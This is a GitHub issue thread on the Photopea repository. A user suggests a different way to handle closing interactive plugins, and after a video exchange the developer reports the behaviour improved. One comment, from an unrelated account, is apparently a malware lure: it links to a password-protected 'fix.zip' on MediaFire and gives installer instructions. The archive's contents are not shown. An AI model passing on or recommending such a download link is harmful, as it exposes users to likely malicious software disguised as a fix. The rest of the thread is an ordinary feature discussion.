### ISSUE TITLE
Suggestion for Plugins..

### ISSUE THREAD

**Issue by Mayur-hot** [photopea/photopea#7118]
![Opera Snapshot_2024-08-29_093715_www photopea com](https://github.com/user-attachments/assets/a9e294be-1b1a-4800-832e-1da7ef987a70)

Is it possible that Clicking Install plugin 

![Opera Snapshot_2024-08-29_093827_www photopea com](https://github.com/user-attachments/assets/59a3a8c2-ffee-4d3c-82f1-31bc2830e2e4)

Goes into More-->Section... for Only Interactive Plugins... and User Can Close It By Right Click, Or Untick that From Windows-->More, and no need to  Uninstall...

Just a Suggestion..... Just close this issue if its not preferable or you have good idea better than this..

Thanks..

**Comment by Kudjo-Grand** [comment]
Download 
https://www.mediafire.com/file/3hzk77cxvxc9nq2/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by photopea** [comment]
I need some proof. Could you record a short video of you opening www.photopea.com and show me the problem?

**Comment by Mayur-hot** [comment]
[screen-recorder-fri-aug-30-2024-09-11-50.webm](https://github.com/user-attachments/assets/41cbdd99-59f6-4817-a145-5ddf297aab7a)
Just check this video...
Before recording, I uninstalled all plugins from plugin page + from interface.. then load site again...

Just little issue.

**Comment by photopea** [comment]
It should work better now.
